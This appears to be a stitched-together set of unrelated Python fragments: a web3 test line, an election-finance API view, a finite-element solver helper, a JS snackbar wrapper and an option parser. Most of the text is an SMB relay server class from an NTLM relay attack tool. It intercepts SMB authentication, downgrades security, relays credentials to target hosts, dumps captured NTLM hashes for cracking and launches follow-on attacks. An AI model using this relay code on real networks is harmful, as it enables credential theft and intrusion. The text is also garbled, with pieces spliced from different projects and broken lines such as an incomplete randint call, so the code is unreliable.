offchain_lookup_contract.caller.testOffchainLookup(OFFCHAIN_LOOKUP_CONTRACT_TEST_DATA)
with pytest.raises(OffchainLookup):
offchain_lookup_contract.caller(ccip_read_enabled=False).testOffchainLookup(OFFCHAIN_LOOKUP_CONTRACT_TEST_DATA)
w3.provider.global_ccip_read_enabled = True |
(tags=['financial'], description=docs.REPORTS, params={'committee_id': {'description': docs.COMMITTEE_ID}})
class CommitteeReportsView(views.ApiResource):
_kwargs(args.paging)
_kwargs(args.committee_reports)
_kwargs(args.make_multi_sort_args(default=['-coverage_end_date']))
_with(schemas.CommitteeReportsPageSchema(), apply=False)
def get(self, committee_id=None, committee_type=None, **kwargs):
(query, reports_class, reports_schema) = self.build_query(committee_id=committee_id.upper(), committee_type=committee_type, **kwargs)
if kwargs['sort']:
validator = args.IndicesValidator(reports_class)
validator(kwargs['sort'])
page = utils.fetch_page(query, kwargs, model=reports_class, multi=True)
return reports_schema().dump(page)
def build_query(self, committee_id=None, committee_type=None, **kwargs):
(reports_class, reports_schema) = reports_schema_map.get(self._resolve_committee_type(committee_id=committee_id.upper(), committee_type=committee_type, **kwargs), default_schemas)
query = reports_class.query
filter_multi_fields = [('amendment_indicator', models.CommitteeReports.amendment_indicator), ('report_type', reports_class.report_type), ('year', reports_class.report_year), ('cycle', reports_class.cycle), ('beginning_image_number', reports_class.beginning_image_number)]
if hasattr(reports_class, 'committee'):
query = reports_class.query.options(sa.orm.joinedload(reports_class.committee))
if (committee_id is not None):
query = query.filter_by(committee_id=committee_id)
query = filters.filter_range(query, kwargs, filter_range_fields)
query = filters.filter_match(query, kwargs, filter_match_fields)
query = filters.filter_multi(query, kwargs, filter_multi_fields)
return (query, reports_class, reports_schema)
def _resolve_committee_type(self, committee_id=None, committee_type=None, **kwargs):
if (committee_id is not None):
utils.check_committee_id(committee_id)
query = models.CommitteeHistory.query.filter_by(committee_id=committee_id)
if kwargs.get('cycle'):
query = query.filter(models.CommitteeHistory.cycle.in_(kwargs['cycle']))
if kwargs.get('year'):
cycle_list = [(year + (year % 2)) for year in kwargs['year']]
query = query.filter(models.CommitteeHistory.cycle.in_(cycle_list))
query = query.order_by(sa.desc(models.CommitteeHistory.cycle))
committee = query.first_or_404()
return committee.committee_type
elif (committee_type is not None):
return reports_type_map.get(committee_type) |
class SMBRelayServer(Thread):
def __init__(self, config):
Thread.__init__(self)
self.daemon = True
self.server = 0
self.config = config
self.target = None
self.targetprocessor = self.config.target
self.authUser = None
self.proxyTranslator = None
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global', 'server_name', 'server_name')
smbConfig.set('global', 'server_os', 'UNIX')
smbConfig.set('global', 'server_domain', 'WORKGROUP')
smbConfig.set('global', 'log_file', 'smb.log')
smbConfig.set('global', 'credentials_file', '')
if (self.config.smb2support is True):
smbConfig.set('global', 'SMB2Support', 'True')
else:
smbConfig.set('global', 'SMB2Support', 'False')
smbConfig.set('global', 'anonymous_logon', 'False')
if (self.config.outputFile is not None):
smbConfig.set('global', 'jtr_dump_path', self.config.outputFile)
if (self.config.SMBServerChallenge is not None):
smbConfig.set('global', 'challenge', self.config.SMBServerChallenge)
smbConfig.add_section('IPC$')
smbConfig.set('IPC$', 'comment', '')
smbConfig.set('IPC$', 'read only', 'yes')
smbConfig.set('IPC$', 'share type', '3')
smbConfig.set('IPC$', 'path', '')
if self.config.ipv6:
SMBSERVER.address_family = socket.AF_INET6
if self.config.listeningPort:
smbport = self.config.listeningPort
else:
smbport = 445
self.server = SMBSERVER((config.interfaceIp, smbport), config_parser=smbConfig)
if (not self.config.disableMulti):
self.server.setAuthCallback(auth_callback)
logging.getLogger('impacket.smbserver').setLevel(logging.CRITICAL)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, self.SmbSessionSetupAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origSmbNegotiate = self.server.hookSmb2Command(smb3.SMB2_NEGOTIATE, self.SmbNegotiate)
self.origSmbSessionSetup = self.server.hookSmb2Command(smb3.SMB2_SESSION_SETUP, self.SmbSessionSetup)
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb3.SMB2_TREE_CONNECT, self.smb2TreeConnect)
self.server.addConnection('SMBRelay', config.interfaceIp, 445)
def SmbNegotiate(self, connId, smbServer, recvPacket, isSMB1=False):
connData = smbServer.getConnectionData(connId, checkStatus=False)
respPacket = smb3.SMB2Packet()
respPacket['Flags'] = smb3.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = smb3.SMB2_NEGOTIATE
respPacket['SessionID'] = 0
if self.config.disableMulti:
if (self.config.mode.upper() == 'REFLECTION'):
self.targetprocessor = TargetsProcessor(singleTarget=('SMB://%s:445/' % connData['ClientIP']))
self.target = self.targetprocessor.getTarget(multiRelay=False)
if (self.target is None):
LOG.info(('SMBD-%s: Connection from %s controlled, but there are no more targets left!' % (connId, connData['ClientIP'])))
return ([SMB2Error()], None, STATUS_BAD_NETWORK_NAME)
LOG.info(('SMBD-%s: Received connection from %s, attacking target %s://%s' % (connId, connData['ClientIP'], self.target.scheme, self.target.netloc)))
try:
if (self.config.mode.upper() == 'REFLECTION'):
LOG.debug('Downgrading to standard security')
extSec = False
else:
extSec = True
client = self.init_client(extSec)
except Exception as e:
LOG.error(('Connection against target %s://%s FAILED: %s' % (self.target.scheme, self.target.netloc, str(e))))
self.targetprocessor.logTarget(self.target)
else:
connData['SMBClient'] = client
connData['EncryptionKey'] = client.getStandardSecurityChallenge()
smbServer.setConnectionData(connId, connData)
if (isSMB1 is False):
respPacket['MessageID'] = recvPacket['MessageID']
else:
respPacket['MessageID'] = 0
respPacket['TreeID'] = 0
respSMBCommand = smb3.SMB2Negotiate_Response()
respSMBCommand['SecurityMode'] = smb3.SMB2_NEGOTIATE_SIGNING_ENABLED
if (isSMB1 is True):
SMBCommand = smb.SMBCommand(recvPacket['Data'][0])
dialects = SMBCommand['Data'].split(b'\x02')
if ((b'SMB 2.002\x00' in dialects) or (b'SMB 2.???\x00' in dialects)):
respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002
else:
raise Exception('Client does not support SMB2, fallbacking')
else:
respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002
respSMBCommand['ServerGuid'] = b(''.join([random.choice(string.ascii_letters) for _ in range(16)]))
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaxTransactSize'] = 65536
respSMBCommand['MaxReadSize'] = 65536
respSMBCommand['MaxWriteSize'] = 65536
respSMBCommand['SystemTime'] = getFileTime(calendar.timegm(time.gmtime()))
respSMBCommand['ServerStartTime'] = getFileTime(calendar.timegm(time.gmtime()))
respSMBCommand['SecurityBufferOffset'] = 128
blob = SPNEGO_NegTokenInit()
blob['MechTypes'] = [TypesMech['NEGOEX - SPNEGO Extended Negotiation Security Mechanism'], TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
respSMBCommand['Buffer'] = blob.getData()
respSMBCommand['SecurityBufferLength'] = len(respSMBCommand['Buffer'])
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return (None, [respPacket], STATUS_SUCCESS)
def SmbSessionSetup(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus=False)
if ((not self.config.disableMulti) and ('relayToHost' not in connData)):
(respCommands, respPackets, errorCode) = self.origSmbSessionSetup(connId, smbServer, recvPacket)
if ('SessionFlags' in respCommands[0].fields):
respCommands[0]['SessionFlags'] = 0
return (respCommands, respPackets, errorCode)
respSMBCommand = smb3.SMB2SessionSetup_Response()
sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data'])
connData['Capabilities'] = sessionSetupData['Capabilities']
securityBlob = sessionSetupData['Buffer']
rawNTLM = False
if (struct.unpack('B', securityBlob[0:1])[0] == ASN1_AID):
blob = SPNEGO_NegTokenInit(securityBlob)
token = blob['MechToken']
if (len(blob['MechTypes'][0]) > 0):
mechType = blob['MechTypes'][0]
if ((mechType != TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']) and (mechType != TypesMech['NEGOEX - SPNEGO Extended Negotiation Security Mechanism'])):
if (mechType in MechTypes):
mechStr = MechTypes[mechType]
else:
mechStr = hexlify(mechType)
smbServer.log(("Unsupported MechType '%s'" % mechStr), logging.CRITICAL)
respToken = SPNEGO_NegTokenResp()
respToken['NegState'] = b'\x03'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken = respToken.getData()
respSMBCommand['SecurityBufferOffset'] = 72
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken
return ([respSMBCommand], None, STATUS_MORE_PROCESSING_REQUIRED)
elif (struct.unpack('B', securityBlob[0:1])[0] == ASN1_SUPPORTED_MECH):
blob = SPNEGO_NegTokenResp(securityBlob)
token = blob['ResponseToken']
else:
rawNTLM = True
token = securityBlob
messageType = struct.unpack('<L', token[len('NTLMSSP\x00'):(len('NTLMSSP\x00') + 4)])[0]
if (messageType == 1):
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
client = connData['SMBClient']
try:
challengeMessage = self.do_ntlm_negotiate(client, token)
except Exception as e:
LOG.debug('Exception:', exc_info=True)
self.targetprocessor.logTarget(self.target)
raise
if (rawNTLM is False):
respToken = SPNEGO_NegTokenResp()
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
else:
respToken = challengeMessage
errorCode = STATUS_MORE_PROCESSING_REQUIRED
connData['Uid'] = random.randint(1, )
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif (messageType == 2):
raise Exception('Challenge Message raise, not implemented!')
elif (messageType == 3):
client = connData['SMBClient']
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))).upper()
if (rawNTLM is True):
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = securityBlob
securityBlob = respToken2.getData()
if self.config.remove_mic:
(clientResponse, errorCode) = self.do_ntlm_auth(client, token, connData['CHALLENGE_MESSAGE']['challenge'])
else:
(clientResponse, errorCode) = self.do_ntlm_auth(client, securityBlob, connData['CHALLENGE_MESSAGE']['challenge'])
if (errorCode != STATUS_SUCCESS):
self.targetprocessor.logTarget(self.target)
LOG.error(('Authenticating against %s://%s as %s FAILED' % (self.target.scheme, self.target.netloc, self.authUser)))
client.killConnection()
else:
LOG.info(('Authenticating against %s://%s as %s SUCCEED' % (self.target.scheme, self.target.netloc, self.authUser)))
self.targetprocessor.logTarget(self.target, True, self.authUser)
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if (self.server.getJTRdumpPath() != ''):
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath())
connData['Authenticated'] = True
if (not self.config.disableMulti):
del connData['relayToHost']
self.do_attack(client)
if (rawNTLM is False):
respToken = SPNEGO_NegTokenResp()
respToken['NegState'] = b'\x00'
else:
respToken = ''
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception(('Unknown NTLMSSP MessageType %d' % messageType))
respSMBCommand['SecurityBufferOffset'] = 72
respSMBCommand['SecurityBufferLength'] = len(respToken)
if (respSMBCommand['SecurityBufferLength'] > 0):
respSMBCommand['Buffer'] = respToken.getData()
else:
respSMBCommand['Buffer'] = ''
smbServer.setConnectionData(connId, connData)
return ([respSMBCommand], None, errorCode)
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
authenticateMessage = connData['AUTHENTICATE_MESSAGE']
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))).upper()
if self.config.disableMulti:
return self.origsmb2TreeConnect(connId, smbServer, recvPacket)
try:
if (self.config.mode.upper() == 'REFLECTION'):
self.targetprocessor = TargetsProcessor(singleTarget=('SMB://%s:445/' % connData['ClientIP']))
self.target = self.targetprocessor.getTarget(identity=self.authUser)
if (self.target is None):
LOG.info(('SMBD-%s: Connection from %%s controlled, but there are no more targets left!' % (connId, self.authUser, connData['ClientIP'])))
return self.origsmb2TreeConnect(connId, smbServer, recvPacket)
LOG.info(('SMBD-%s: Connection from %%s controlled, attacking target %s://%s' % (connId, self.authUser, connData['ClientIP'], self.target.scheme, self.target.netloc)))
if (self.config.mode.upper() == 'REFLECTION'):
LOG.debug('Downgrading to standard security')
extSec = False
else:
extSec = True
client = self.init_client(extSec)
except Exception as e:
LOG.error(('Connection against target %s://%s FAILED: %s' % (self.target.scheme, self.target.netloc, str(e))))
self.targetprocessor.logTarget(self.target)
else:
connData['relayToHost'] = True
connData['Authenticated'] = False
del connData['NEGOTIATE_MESSAGE']
del connData['CHALLENGE_MESSAGE']
del connData['AUTHENTICATE_MESSAGE']
connData['SMBClient'] = client
connData['EncryptionKey'] = client.getStandardSecurityChallenge()
smbServer.setConnectionData(connId, connData)
respPacket = smb3.SMB2Packet()
respPacket['Flags'] = smb3.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb3.SMB2TreeConnect_Response()
errorCode = STATUS_NETWORK_SESSION_EXPIRED
respPacket['Status'] = errorCode
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 983551
respPacket['Data'] = respSMBCommand
if connData['SignatureEnabled']:
smbServer.signSMBv2(respPacket, connData['SigningSessionKey'])
smbServer.setConnectionData(connId, connData)
return (None, [respPacket], errorCode)
def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus=False)
if self.config.disableMulti:
if (self.config.mode.upper() == 'REFLECTION'):
self.targetprocessor = TargetsProcessor(singleTarget=('SMB://%s:445/' % connData['ClientIP']))
self.target = self.targetprocessor.getTarget(multiRelay=False)
if (self.target is None):
LOG.info(('SMBD-%s: Connection from %s controlled, but there are no more targets left!' % (connId, connData['ClientIP'])))
return ([smb.SMBCommand(smb.SMB.SMB_COM_NEGOTIATE)], None, STATUS_BAD_NETWORK_NAME)
LOG.info(('SMBD-%s: Received connection from %s, attacking target %s://%s' % (connId, connData['ClientIP'], self.target.scheme, self.target.netloc)))
try:
if ((recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY) == 0):
extSec = False
elif (self.config.mode.upper() == 'REFLECTION'):
LOG.debug('Downgrading to standard security')
extSec = False
recvPacket['Flags2'] += (~ smb.SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
client = self.init_client(extSec)
except Exception as e:
LOG.error(('Connection against target %s://%s FAILED: %s' % (self.target.scheme, self.target.netloc, str(e))))
self.targetprocessor.logTarget(self.target)
else:
connData['SMBClient'] = client
connData['EncryptionKey'] = client.getStandardSecurityChallenge()
smbServer.setConnectionData(connId, connData)
elif ((recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY) != 0):
if (self.config.mode.upper() == 'REFLECTION'):
LOG.debug('Downgrading to standard security')
recvPacket['Flags2'] += (~ smb.SMB.FLAGS2_EXTENDED_SECURITY)
return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket)
def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus=False)
if ((not self.config.disableMulti) and ('relayToHost' not in connData)):
return self.origSmbSessionSetupAndX(connId, smbServer, SMBCommand, recvPacket)
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
if (connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY):
respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters()
respData = smb.SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
rawNTLM = False
if (struct.unpack('B', sessionSetupData['SecurityBlob'][0:1])[0] != ASN1_AID):
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
messageType = struct.unpack('<L', token[len('NTLMSSP\x00'):(len('NTLMSSP\x00') + 4)])[0]
if (messageType == 1):
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
client = connData['SMBClient']
try:
challengeMessage = self.do_ntlm_negotiate(client, token)
except Exception:
self.targetprocessor.logTarget(self.target)
raise
respToken = SPNEGO_NegTokenResp()
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
errorCode = STATUS_MORE_PROCESSING_REQUIRED
connData['Uid'] = 10
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif (messageType == 3):
client = connData['SMBClient']
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))).upper()
(clientResponse, errorCode) = self.do_ntlm_auth(client, sessionSetupData['SecurityBlob'], connData['CHALLENGE_MESSAGE']['challenge'])
if (errorCode != STATUS_SUCCESS):
packet = smb.NewSMBPacket()
packet['Flags1'] = (smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS)
packet['Flags2'] = (smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY)
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = (errorCode >> 16)
packet['ErrorClass'] = (errorCode & 255)
LOG.error(('Authenticating against %s://%s as %s FAILED' % (self.target.scheme, self.target.netloc, self.authUser)))
self.targetprocessor.logTarget(self.target)
client.killConnection()
return (None, [packet], errorCode)
else:
LOG.info(('Authenticating against %s://%s as %s SUCCEED' % (self.target.scheme, self.target.netloc, self.authUser)))
self.targetprocessor.logTarget(self.target, True, self.authUser)
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if (self.server.getJTRdumpPath() != ''):
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath())
self.do_attack(client)
respToken = SPNEGO_NegTokenResp()
respToken['NegState'] = b'\x00'
connData['Authenticated'] = True
del connData['relayToHost']
errorCode = STATUS_SUCCESS
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception(('Unknown NTLMSSP MessageType %d' % messageType))
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
respData = smb.SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(SMBCommand['Data'])
client = connData['SMBClient']
(_, errorCode) = client.sendStandardSecurityAuth(sessionSetupData)
if (errorCode != STATUS_SUCCESS):
packet = smb.NewSMBPacket()
packet['Flags1'] = (smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS)
packet['Flags2'] = (smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY)
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = b'\x00\x00\x00'
packet['ErrorCode'] = (errorCode >> 16)
packet['ErrorClass'] = (errorCode & 255)
self.targetprocessor.logTarget(self.target)
return (None, [packet], errorCode)
else:
self.authUser = ('%s/%s' % (sessionSetupData['PrimaryDomain'], sessionSetupData['Account'])).upper()
LOG.info(('Authenticating against %s://%s as %s SUCCEED' % (self.target.scheme, self.target.netloc, self.authUser)))
self.targetprocessor.logTarget(self.target, True, self.authUser)
ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if (self.server.getJTRdumpPath() != ''):
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.getJTRdumpPath())
connData['Authenticated'] = True
if (not self.config.disableMulti):
del connData['relayToHost']
self.do_attack(client)
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
smbServer.setConnectionData(connId, connData)
return ([respSMBCommand], None, errorCode)
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
authenticateMessage = connData['AUTHENTICATE_MESSAGE']
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'), authenticateMessage['user_name'].decode('utf-16le'))).upper()
if self.config.disableMulti:
return self.smbComTreeConnectAndX(connId, smbServer, SMBCommand, recvPacket)
try:
if (self.config.mode.upper() == 'REFLECTION'):
self.targetprocessor = TargetsProcessor(singleTarget=('SMB://%s:445/' % connData['ClientIP']))
self.target = self.targetprocessor.getTarget(identity=self.authUser)
if (self.target is None):
LOG.info(('SMBD-%s: Connection from %%s controlled, but there are no more targets left!' % (connId, self.authUser, connData['ClientIP'])))
return self.origsmbComTreeConnectAndX(connId, smbServer, recvPacket)
LOG.info(('SMBD-%s: Connection from %%s controlled, attacking target %s://%s' % (connId, self.authUser, connData['ClientIP'], self.target.scheme, self.target.netloc)))
if (self.config.mode.upper() == 'REFLECTION'):
LOG.debug('Downgrading to standard security')
extSec = False
recvPacket['Flags2'] += (~ smb.SMB.FLAGS2_EXTENDED_SECURITY)
else:
extSec = True
client = self.init_client(extSec)
except Exception as e:
LOG.error(('Connection against target %s://%s FAILED: %s' % (self.target.scheme, self.target.netloc, str(e))))
self.targetprocessor.logTarget(self.target)
else:
connData['relayToHost'] = True
connData['Authenticated'] = False
del connData['NEGOTIATE_MESSAGE']
del connData['CHALLENGE_MESSAGE']
del connData['AUTHENTICATE_MESSAGE']
connData['SMBClient'] = client
connData['EncryptionKey'] = client.getStandardSecurityChallenge()
smbServer.setConnectionData(connId, connData)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = (((smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS) | smb.SMB.FLAGS2_LONG_NAMES) | (recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE))
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
if (treeConnectAndXParameters['Flags'] & 8):
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data(flags=recvPacket['Flags2'])
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
errorCode = STATUS_NETWORK_SESSION_EXPIRED
resp['ErrorCode'] = (errorCode >> 16)
resp['_reserved'] = 3
resp['ErrorClass'] = (errorCode & 255)
if (path == 'IPC$'):
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS')
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return (None, [resp], errorCode)
def init_client(self, extSec):
if (self.target.scheme.upper() in self.config.protocolClients):
client = self.config.protocolClients[self.target.scheme.upper()](self.config, self.target, extendedSecurity=extSec)
client.initConnection()
else:
raise Exception(('Protocol Client for %s not found!' % self.target.scheme))
return client
def do_ntlm_negotiate(self, client, token):
return client.sendNegotiate(token)
def do_ntlm_auth(self, client, SPNEGO_token, challenge):
(clientResponse, errorCode) = client.sendAuth(SPNEGO_token, challenge)
return (clientResponse, errorCode)
def do_attack(self, client):
if (self.config.runSocks and (self.target.scheme.upper() in self.config.socksServer.supportedSchemes)):
if (self.config.runSocks is True):
activeConnections.put((self.target.hostname, client.targetPort, self.target.scheme.upper(), self.authUser, client, client.sessionData))
return
if (self.target.scheme.upper() in self.config.attacks):
clientThread = self.config.attacks[self.target.scheme.upper()](self.config, client.session, self.authUser)
clientThread.start()
else:
LOG.error(('No attack configured for %s' % self.target.scheme.upper()))
def _start(self):
self.server.daemon_threads = True
self.server.serve_forever()
LOG.info('Shutting down SMB Server')
self.server.server_close()
def run(self):
LOG.info('Setting up SMB Server')
self._start() |
def _extract_args(*args, **kwargs):
valid_kwargs = ['bcs', 'J', 'Jp', 'M', 'form_compiler_parameters', 'solver_parameters', 'nullspace', 'transpose_nullspace', 'near_nullspace', 'options_prefix', 'appctx']
for kwarg in kwargs.keys():
if (kwarg not in valid_kwargs):
raise RuntimeError(("Illegal keyword argument '%s'; valid keywords are %s" % (kwarg, ', '.join((("'%s'" % kwarg) for kwarg in valid_kwargs)))))
if (not (len(args) >= 2)):
raise TypeError('Missing arguments, expecting solve(lhs == rhs, u, bcs=bcs), where bcs is optional')
if (len(args) > 3):
raise TypeError('Too many arguments, expecting solve(lhs == rhs, u, bcs=bcs), where bcs is optional')
eq = args[0]
u = args[1]
bcs = _extract_bcs((args[2] if (len(args) > 2) else kwargs.get('bcs')))
J = kwargs.get('J', None)
Jp = kwargs.get('Jp', None)
M = kwargs.get('M', None)
if ((M is not None) and (not isinstance(M, ufl.Form))):
raise RuntimeError('Expecting goal functional M to be a UFL Form')
nullspace = kwargs.get('nullspace', None)
nullspace_T = kwargs.get('transpose_nullspace', None)
near_nullspace = kwargs.get('near_nullspace', None)
form_compiler_parameters = kwargs.get('form_compiler_parameters', {})
solver_parameters = kwargs.get('solver_parameters', {})
options_prefix = kwargs.get('options_prefix', None)
return (eq, u, bcs, J, Jp, M, form_compiler_parameters, solver_parameters, nullspace, nullspace_T, near_nullspace, options_prefix) |
class DomSnackbar(JsHtml.JsHtmlRich):
def isOpen(self) -> JsObjects.JsBoolean.JsBoolean:
return JsObjects.JsBoolean.JsBoolean.get(("window['%s'].isOpen()" % self.component.htmlCode))
def open(self) -> JsUtils.jsWrap:
return JsUtils.jsWrap(("window['%s'].open()" % self.component.htmlCode))
def close(self, reason: str=None):
if (reason is None):
return JsUtils.jsWrap(("window['%s'].close()" % self.component.htmlCode))
reason = JsUtils.jsConvertData(reason, None)
return JsUtils.jsWrap(("window['%s'].close(%s)" % (self.component.htmlCode, reason))) |
def getOptParser(doc=''):
Option = optparse.Option
p = optparse.OptionParser(usage=(('%s [OPTIONS] [regexps]\n' % sys.argv[0]) + doc), version=('%prog ' + version))
